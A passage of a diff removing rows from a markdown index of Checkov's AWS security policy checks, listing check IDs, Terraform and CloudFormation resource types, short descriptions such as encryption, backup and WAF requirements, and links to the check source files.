-| 783 | CKV_AWS_341 | resource | aws_launch_configuration | Ensure Launch template should not have a metadata response hop limit greater than 1 | Terraform | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py) |
-| 784 | CKV_AWS_341 | resource | aws_launch_template | Ensure Launch template should not have a metadata response hop limit greater than 1 | Terraform | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py) |
-| 785 | CKV_AWS_342 | resource | aws_waf_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) |
-| 786 | CKV_AWS_342 | resource | aws_waf_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) |
-| 787 | CKV_AWS_342 | resource | aws_wafregional_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) |
-| 788 | CKV_AWS_342 | resource | aws_wafregional_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) |
-| 789 | CKV_AWS_342 | resource | aws_wafv2_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) |
-| 790 | CKV_AWS_342 | resource | aws_wafv2_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) |
-| 791 | CKV_AWS_343 | resource | aws_redshift_cluster | Ensure Amazon Redshift clusters should have automatic snapshots enabled | Terraform | [RedshiftClusterAutoSnap.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAutoSnap.py) |
-| 792 | CKV_AWS_344 | resource | aws_networkfirewall_firewall | Ensure that Network firewalls have deletion protection enabled | Terraform | [NetworkFirewallDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallDeletionProtection.py) |
-| 793 | CKV_AWS_345 | resource | aws_networkfirewall_firewall | Ensure that Network firewall encryption is via a CMK | Terraform | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py) |
-| 794 | CKV_AWS_345 | resource | aws_networkfirewall_rule_group | Ensure that Network firewall encryption is via a CMK | Terraform | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py) |
-| 795 | CKV_AWS_346 | resource | aws_networkfirewall_firewall_policy | Ensure Network Firewall Policy defines an encryption configuration that uses a customer managed Key (CMK) | Terraform | [NetworkFirewallPolicyDefinesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallPolicyDefinesCMK.py) |
-| 796 | CKV_AWS_347 | resource | aws_neptune_cluster | Ensure Neptune is encrypted by KMS using a customer managed Key (CMK) | Terraform | [NeptuneClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterEncryptedWithCMK.py) |
-| 797 | CKV_AWS_348 | resource | aws_iam_access_key | Ensure IAM root user doesnt have Access keys | Terraform | [IAMUserRootAccessKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserRootAccessKeys.py) |
-| 798 | CKV_AWS_349 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts local disks | Terraform | [EMRClusterConfEncryptsLocalDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsLocalDisk.py) |
-| 799 | CKV_AWS_350 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts EBS disks | Terraform | [EMRClusterConfEncryptsEBS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsEBS.py) |
-| 800 | CKV_AWS_351 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts InTransit | Terraform | [EMRClusterConfEncryptsInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsInTransit.py) |
-| 801 | CKV_AWS_352 | resource | aws_network_acl_rule | Ensure NACL ingress does not allow all Ports | Terraform | [NetworkACLUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestricted.py) |
-| 802 | CKV_AWS_353 | resource | aws_db_instance | Ensure that RDS instances have performance insights enabled | Terraform | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py) |
-| 803 | CKV_AWS_353 | resource | aws_rds_cluster_instance | Ensure that RDS instances have performance insights enabled | Terraform | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py) |
-| 804 | CKV_AWS_354 | resource | aws_db_instance | Ensure RDS Performance Insights are encrypted using KMS CMKs | Terraform | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py) |
-| 805 | CKV_AWS_354 | resource | aws_rds_cluster_instance | Ensure RDS Performance Insights are encrypted using KMS CMKs | Terraform | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py) |
-| 806 | CKV_AWS_355 | resource | aws_iam_group_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) |
-| 807 | CKV_AWS_355 | resource | aws_iam_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) |
-| 808 | CKV_AWS_355 | resource | aws_iam_role_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) |
-| 809 | CKV_AWS_355 | resource | aws_iam_user_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) |
-| 810 | CKV_AWS_355 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) |
-| 811 | CKV_AWS_356 | data | aws_iam_policy_document | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [ResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/ResourcePolicyDocument.py) |
-| 812 | CKV_AWS_357 | resource | aws_transfer_server | Ensure Transfer Server allows only secure protocols | Terraform | [TransferServerAllowsOnlySecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerAllowsOnlySecureProtocols.py) |
-| 813 | CKV_AWS_358 | data | aws_iam_policy_document | Ensure GitHub Actions OIDC trust policies only allows actions from a specific known organization | Terraform | [GithubActionsOIDCTrustPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/GithubActionsOIDCTrustPolicy.py) |
-| 814 | CKV_AWS_359 | resource | aws_neptune_cluster | Neptune DB clusters should have IAM database authentication enabled | Terraform |
[NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py) | -| 815 | CKV_AWS_360 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB has an adequate backup retention period | Cloudformation | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBBackupRetention.py) | -| 816 | CKV_AWS_360 | resource | aws_docdb_cluster | Ensure DocumentDB has an adequate backup retention period | Terraform | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBBackupRetention.py) | -| 817 | CKV_AWS_361 | resource | AWS::Neptune::DBCluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Cloudformation | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterBackupRetention.py) | -| 818 | CKV_AWS_361 | resource | aws_neptune_cluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Terraform | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterBackupRetention.py) | -| 819 | CKV_AWS_362 | resource | aws_neptune_cluster | Neptune DB clusters should be configured to copy tags to snapshots | Terraform | [NeptuneDBClustersCopyTagsToSnapshots.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersCopyTagsToSnapshots.py) | -| 820 | CKV_AWS_363 | resource | AWS::Lambda::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | -| 821 | CKV_AWS_363 | resource 
| AWS::Serverless::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | -| 822 | CKV_AWS_363 | resource | aws_lambda_function | Ensure Lambda Runtime is not deprecated | Terraform | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DeprecatedLambdaRuntime.py) | -| 823 | CKV_AWS_364 | resource | AWS::Lambda::Permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Cloudformation | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py) | -| 824 | CKV_AWS_364 | resource | aws_lambda_permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Terraform | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaServicePermission.py) | -| 825 | CKV_AWS_365 | resource | aws_ses_configuration_set | Ensure SES Configuration Set enforces TLS usage | Terraform | [SesConfigurationSetDefinesTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SesConfigurationSetDefinesTLS.py) | -| 826 | CKV2_AWS_1 | resource | aws_network_acl | Ensure that all NACL are attached to subnets | Terraform | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml) | -| 827 | CKV2_AWS_1 | resource | aws_subnet | Ensure that all NACL are attached to subnets | Terraform | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml) | -| 828 | CKV2_AWS_2 | resource | aws_ebs_volume | Ensure that 
only encrypted EBS volumes are attached to EC2 instances | Terraform | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml) | -| 829 | CKV2_AWS_2 | resource | aws_volume_attachment | Ensure that only encrypted EBS volumes are attached to EC2 instances | Terraform | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml) | -| 830 | CKV2_AWS_3 | resource | aws_guardduty_detector | Ensure GuardDuty is enabled to specific org/region | Terraform | [GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml) | -| 831 | CKV2_AWS_3 | resource | aws_guardduty_organization_configuration | Ensure GuardDuty is enabled to specific org/region | Terraform | [GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml) | -| 832 | CKV2_AWS_4 | resource | aws_api_gateway_method_settings | Ensure API Gateway stage have logging level defined as appropriate | Terraform | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml) | -| 833 | CKV2_AWS_4 | resource | aws_api_gateway_stage | Ensure API Gateway stage have logging level defined as appropriate | Terraform | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml) | -| 834 | CKV2_AWS_5 | resource | aws_security_group | Ensure that Security Groups are attached to another resource | Terraform | 
[SGAttachedToResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SGAttachedToResource.yaml) | -| 835 | CKV2_AWS_6 | resource | aws_s3_bucket | Ensure that S3 bucket has a Public Access block | Terraform | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml) | -| 836 | CKV2_AWS_6 | resource | aws_s3_bucket_public_access_block | Ensure that S3 bucket has a Public Access block | Terraform | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml) | -| 837 | CKV2_AWS_7 | resource | aws_emr_cluster | Ensure that Amazon EMR clusters' security groups are not open to the world | Terraform | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml) | -| 838 | CKV2_AWS_7 | resource | aws_security_group | Ensure that Amazon EMR clusters' security groups are not open to the world | Terraform | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml) | -| 839 | CKV2_AWS_8 | resource | aws_rds_cluster | Ensure that RDS clusters has backup plan of AWS Backup | Terraform | [RDSClusterHasBackupPlan.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSClusterHasBackupPlan.yaml) | -| 840 | CKV2_AWS_9 | resource | aws_backup_selection | Ensure that EBS are added in the backup plans of AWS Backup | Terraform | [EBSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EBSAddedBackup.yaml) | -| 841 | CKV2_AWS_10 | resource | aws_cloudtrail | Ensure CloudTrail trails are integrated with CloudWatch Logs | Terraform 
| [CloudtrailHasCloudwatch.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudtrailHasCloudwatch.yaml) | -| 842 | CKV2_AWS_11 | resource | aws_vpc | Ensure VPC flow logging is enabled in all VPCs | Terraform | [VPCHasFlowLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasFlowLog.yaml) | -| 843 | CKV2_AWS_12 | resource | aws_default_security_group | Ensure the default security group of every VPC restricts all traffic | Terraform | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml) | -| 844 | CKV2_AWS_12 | resource | aws_vpc | Ensure the default security group of every VPC restricts all traffic | Terraform | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml) | -| 845 | CKV2_AWS_14 | resource | aws_iam_group | Ensure that IAM groups includes at least one IAM user | Terraform | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml) | -| 846 | CKV2_AWS_14 | resource | aws_iam_group_membership | Ensure that IAM groups includes at least one IAM user | Terraform | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml) | -| 847 | CKV2_AWS_15 | resource | aws_autoscaling_group | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. 
| Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | -| 848 | CKV2_AWS_15 | resource | aws_elb | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | -| 849 | CKV2_AWS_15 | resource | aws_lb_target_group | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | -| 850 | CKV2_AWS_16 | resource | aws_appautoscaling_target | Ensure that Auto Scaling is enabled on your DynamoDB tables | Terraform | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml) | -| 851 | CKV2_AWS_16 | resource | aws_dynamodb_table | Ensure that Auto Scaling is enabled on your DynamoDB tables | Terraform | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml) | -| 852 | CKV2_AWS_18 | resource | aws_backup_selection | Ensure that Elastic File System (Amazon EFS) file systems are added in the backup plans of AWS Backup | Terraform | [EFSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EFSAddedBackup.yaml) | -| 853 | CKV2_AWS_19 | resource | aws_eip | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances | Terraform | 
[EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml) | -| 854 | CKV2_AWS_19 | resource | aws_eip_association | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances | Terraform | [EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml) | -| 855 | CKV2_AWS_20 | resource | aws_alb | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | -| 856 | CKV2_AWS_20 | resource | aws_alb_listener | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | -| 857 | CKV2_AWS_20 | resource | aws_lb | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | -| 858 | CKV2_AWS_20 | resource | aws_lb_listener | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | -| 859 | CKV2_AWS_21 | resource | aws_iam_group_membership | Ensure that all IAM users are members of at least one IAM group. 
| Terraform | [IAMUsersAreMembersAtLeastOneGroup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUsersAreMembersAtLeastOneGroup.yaml) | -| 860 | CKV2_AWS_22 | resource | aws_iam_user | Ensure an IAM User does not have access to the console | Terraform | [IAMUserHasNoConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUserHasNoConsoleAccess.yaml) | -| 861 | CKV2_AWS_23 | resource | aws_route53_record | Route53 A Record has Attached Resource | Terraform | [Route53ARecordAttachedResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ARecordAttachedResource.yaml) | -| 862 | CKV2_AWS_27 | resource | aws_rds_cluster | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled | Terraform | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml) | -| 863 | CKV2_AWS_27 | resource | aws_rds_cluster_parameter_group | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled | Terraform | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml) | -| 864 | CKV2_AWS_28 | resource | aws_alb | Ensure public facing ALB are protected by WAF | Terraform | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml) | -| 865 | CKV2_AWS_28 | resource | aws_lb | Ensure public facing ALB are protected by WAF | Terraform | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml) | -| 866 | CKV2_AWS_29 | resource | aws_api_gateway_rest_api | Ensure public API gateway are protected by WAF | Terraform | 
[APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml) | -| 867 | CKV2_AWS_29 | resource | aws_api_gateway_stage | Ensure public API gateway are protected by WAF | Terraform | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml) | -| 868 | CKV2_AWS_30 | resource | aws_db_instance | Ensure Postgres RDS as aws_db_instance has Query Logging enabled | Terraform | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml) | -| 869 | CKV2_AWS_30 | resource | aws_db_parameter_group | Ensure Postgres RDS as aws_db_instance has Query Logging enabled | Terraform | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml) | -| 870 | CKV2_AWS_31 | resource | aws_wafv2_web_acl | Ensure WAF2 has a Logging Configuration | Terraform | [WAF2HasLogs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/WAF2HasLogs.yaml) | -| 871 | CKV2_AWS_32 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has a response headers policy attached | Terraform | [CloudFrontHasResponseHeadersPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasResponseHeadersPolicy.yaml) | -| 872 | CKV2_AWS_33 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync is protected by WAF | Cloudformation | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/AppSyncProtectedByWAF.yaml) | -| 873 | CKV2_AWS_33 | resource | aws_appsync_graphql_api | Ensure AppSync is protected by WAF | Terraform | 
[AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppSyncProtectedByWAF.yaml) | -| 874 | CKV2_AWS_34 | resource | aws_ssm_parameter | AWS SSM Parameter should be Encrypted | Terraform | [AWSSSMParameterShouldBeEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSSSMParameterShouldBeEncrypted.yaml) | -| 875 | CKV2_AWS_35 | resource | aws_route | AWS NAT Gateways should be utilized for the default route | Terraform | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml) | -| 876 | CKV2_AWS_35 | resource | aws_route_table | AWS NAT Gateways should be utilized for the default route | Terraform | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml) | -| 877 | CKV2_AWS_36 | resource | aws_ssm_parameter | Ensure terraform is not sending SSM secrets to untrusted domains over HTTP | Terraform | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml) | -| 878 | CKV2_AWS_36 | resource | data.http | Ensure terraform is not sending SSM secrets to untrusted domains over HTTP | Terraform | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml) | -| 879 | CKV2_AWS_37 | resource | aws | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 880 | CKV2_AWS_37 | resource | aws_accessanalyzer_analyzer | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 881 | CKV2_AWS_37 | resource | aws_acm_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 882 | CKV2_AWS_37 | resource | aws_acm_certificate_validation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 883 | CKV2_AWS_37 | resource | aws_acmpca_certificate_authority | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 884 | CKV2_AWS_37 | resource | aws_ami | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 885 | CKV2_AWS_37 | resource | aws_ami_copy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 886 | CKV2_AWS_37 | resource | aws_ami_from_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 887 | CKV2_AWS_37 | resource | aws_ami_launch_permission | Ensure CodeCommit associates an 
